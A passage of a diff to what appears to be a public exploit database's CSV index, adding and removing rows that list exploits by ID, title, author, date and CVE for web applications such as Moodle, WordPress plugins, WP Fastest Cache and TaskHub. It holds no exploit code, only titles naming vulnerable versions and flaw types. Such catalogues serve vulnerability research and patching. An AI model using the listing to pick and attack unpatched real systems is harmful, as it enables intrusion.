+51833,exploits/php/webapps/51833.txt,"Blood Bank v1.0 - Multiple SQL Injection",2024-02-28,"Ersin Erenler",webapps,php,,2024-02-28,2024-02-28,0,,,,,,
 51697,exploits/php/webapps/51697.txt,"Blood Donor Management System v1.0 - Stored XSS",2023-09-04,"Ehlullah Albayrak",webapps,php,,2023-09-04,2023-09-06,1,,,,,,
 47842,exploits/php/webapps/47842.txt,"BloodX 1.0 - Authentication Bypass",2020-01-02,riamloo,webapps,php,,2020-01-02,2020-02-07,1,,,,,,
 48786,exploits/php/webapps/48786.txt,"BloodX CMS 1.0 - Authentication Bypass",2020-09-03,BKpatron,webapps,php,,2020-09-03,2020-09-03,0,,,,,,
@@ -23664,7 +23666,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49114,exploits/php/webapps/49114.txt,"Moodle 3.8 - Unrestricted File Upload",2020-11-27,"Sirwan Veisi",webapps,php,,2020-11-27,2020-11-27,0,,,,,,
 50180,exploits/php/webapps/50180.py,"Moodle 3.9 - Remote Code Execution (RCE) (Authenticated)",2021-08-05,lanz,webapps,php,,2021-08-05,2021-08-05,0,,,,,,
 51820,exploits/php/webapps/51820.txt,"Moodle 4.3 - Insecure Direct Object Reference",2024-02-27,tmrswrr,webapps,php,,2024-02-27,2024-02-27,0,,,,,,
-51821,exploits/php/webapps/51821.txt,"Moodle 4.3 - Reflected XSS",2024-02-27,tmrswrr,webapps,php,,2024-02-27,2024-02-27,0,,,,,,
 8297,exploits/php/webapps/8297.txt,"Moodle < 1.6.9/1.7.7/1.8.9/1.9.5 - File Disclosure",2009-03-27,"Christian J. Eibl",webapps,php,,2009-03-26,,1,OSVDB-52998;CVE-2009-1171,,,,,
 28770,exploits/php/webapps/28770.txt,"Moodle Blog 1.18.2.2/1.6.2 Module - SQL Injection",2006-10-08,disfigure,webapps,php,,2006-10-08,2013-10-07,1,CVE-2006-5219;OSVDB-29573,,,,,https://www.securityfocus.com/bid/20395/info
 47177,exploits/php/webapps/47177.txt,"Moodle Filepicker 3.5.2 - Server Side Request Forgery",2019-07-26,"Fabian Mosch_ Nick Theisinger",webapps,php,80,2019-07-26,2019-07-26,0,CVE-2018-1042,"Server-Side Request Forgery (SSRF)",,,http://www.exploit-db.commoodle-3.5.2.tar.gz,
@@ -30566,7 +30567,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 16158,exploits/php/webapps/16158.txt,"TaskFreak! 0.6.4 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-12,LiquidWorm,webapps,php,,2011-02-12,2011-02-12,0,CVE-2011-1062;OSVDB-70932;OSVDB-70878;OSVDB-70877,,,,http://www.exploit-db.comtaskfreak-multi-mysql-0.6.4.tgz,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-4990
 51810,exploits/php/webapps/51810.txt,"taskhub 2.8.7 - SQL Injection",2024-02-26,CraCkEr,webapps,php,,2024-02-26,2024-02-26,0,,,,,,
 51692,exploits/php/webapps/51692.txt,"Taskhub CRM Tool 2.8.6 - SQL Injection",2023-08-21,"Ahmet Ümit BAYRAM",webapps,php,,2023-08-21,2023-08-21,0,,,,,,
-51782,exploits/php/webapps/51782.txt,"TASKHUB-2.8.8 - XSS-Reflected",2024-02-05,nu11secur1ty,webapps,php,,2024-02-05,2024-02-05,0,,,,,,
 15269,exploits/php/webapps/15269.txt,"Tastydir 1.2 (1216) - Multiple Vulnerabilities",2010-10-17,R,webapps,php,,2010-10-17,2015-04-17,0,,,,,,
 34809,exploits/php/webapps/34809.txt,"Tausch Ticket Script 3 - 'suchauftraege_user.php?userid' SQL Injection",2009-07-07,Moudi,webapps,php,,2009-07-07,2014-09-29,1,CVE-2009-2428;OSVDB-55691,,,,,https://www.securityfocus.com/bid/43710/info
 34810,exploits/php/webapps/34810.txt,"Tausch Ticket Script 3 - 'vote.php?descr' SQL Injection",2009-07-07,Moudi,webapps,php,,2009-07-07,2014-09-29,1,CVE-2009-2428;OSVDB-55692,,,,,https://www.securityfocus.com/bid/43710/info
@@ -32738,6 +32738,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 47295,exploits/php/webapps/47295.html,"WordPress Plugin Add Mime Types 2.2.1 - Cross-Site Request Forgery",2019-08-20,"Princy Edward",webapps,php,,2019-08-20,2019-08-20,0,,,,,http://www.exploit-db.comwp-add-mime-types.2.2.1.zip,
 46066,exploits/php/webapps/46066.txt,"WordPress Plugin Adicon Server 1.2 - 'selectedPlace' SQL Injection",2019-01-02,Kaimi,webapps,php,80,2019-01-02,2019-01-02,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comadicons.zip,
 38537,exploits/php/webapps/38537.txt,"WordPress Plugin ADIF Log Search Widget - 'logbook_search.php' Cross-Site Scripting",2013-05-27,k3170makan,webapps,php,,2013-05-27,2015-10-27,1,,"WordPress Plugin",,,,https://www.securityfocus.com/bid/60198/info
+51831,exploits/php/webapps/51831.txt,"WordPress Plugin Admin Bar & Dashboard Access Control Version: 1.2.8 - _Dashboard Redirect_ field Stored Cross-Site Scripting (XSS)",2024-02-28,"Rachit Arora",webapps,php,,2024-02-28,2024-02-28,0,,,,,,
 38966,exploits/php/webapps/38966.txt,"WordPress Plugin Admin Management Xtended 2.4.0 - Privilege escalation",2015-12-14,"Kacper Szurek",webapps,php,80,2015-12-14,2015-12-14,0,OSVDB-131818,"WordPress Plugin",,,,
 43486,exploits/php/webapps/43486.txt,"WordPress Plugin Admin Menu Tree Page View 2.6.9 - Cross-Site Request Forgery / Privilege Escalation",2018-01-10,"Panagiotis Vagenas",webapps,php,80,2018-01-10,2018-01-10,0,,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comadmin-menu-tree-page-view.2.6.9.zip,
 50845,exploits/php/webapps/50845.txt,"WordPress Plugin admin-word-count-column 2.2 - Local File Read",2022-03-30,"Hassan Khan Yusufzai",webapps,php,,2022-03-30,2022-03-30,0,,,,,,
@@ -34004,6 +34005,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49989,exploits/php/webapps/49989.py,"WoWonder Social Network Platform 3.1 - Authentication Bypass",2021-06-11,securityforeveryone.com,webapps,php,,2021-06-11,2021-06-11,0,,,,,,
 51122,exploits/php/webapps/51122.py,"WP All Import v3.6.7 - Remote Code Execution (RCE) (Authenticated)",2023-03-29,AkuCyberSec,webapps,php,,2023-03-29,2023-06-09,1,CVE-2022-1565,,,,,
 51560,exploits/php/webapps/51560.txt,"WP AutoComplete 1.0.4 - Unauthenticated SQLi",2023-07-03,matitanium,webapps,php,,2023-07-03,2023-07-03,0,CVE-2022-4297,,,,,
+51835,exploits/php/webapps/51835.txt,"WP Fastest Cache 1.2.2 - Unauthenticated SQL Injection",2024-02-28,"Meryem Taşkın",webapps,php,,2024-02-28,2024-02-28,0,,,,,,
+51830,exploits/php/webapps/51830.py,"WP Rocket < 2.10.3 - Local File Inclusion (LFI)",2024-02-28,"E1 Coders",webapps,php,,2024-02-28,2024-02-28,0,,,,,,
 47419,exploits/php/webapps/47419.txt,"WP Server Log Viewer 1.0 - 'logfile' Persistent Cross-Site Scripting",2019-09-25,strider,webapps,php,,2019-09-25,2019-09-25,0,,,,,,
 51711,exploits/php/webapps/51711.py,"WP Statistics Plugin 13.1.5 current_page_id - Time based SQL injection (Unauthenticated)",2023-09-04,psychoSherlock,webapps,php,,2023-09-04,2023-09-04,0,CVE-2022-25148,,,,,
 51533,exploits/php/webapps/51533.py,"WP Sticky Social 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting (XSS)",2023-06-20,"Amirhossein Bahramizadeh",webapps,php,,2023-06-20,2023-06-20,0,CVE-2023-3320,,,,,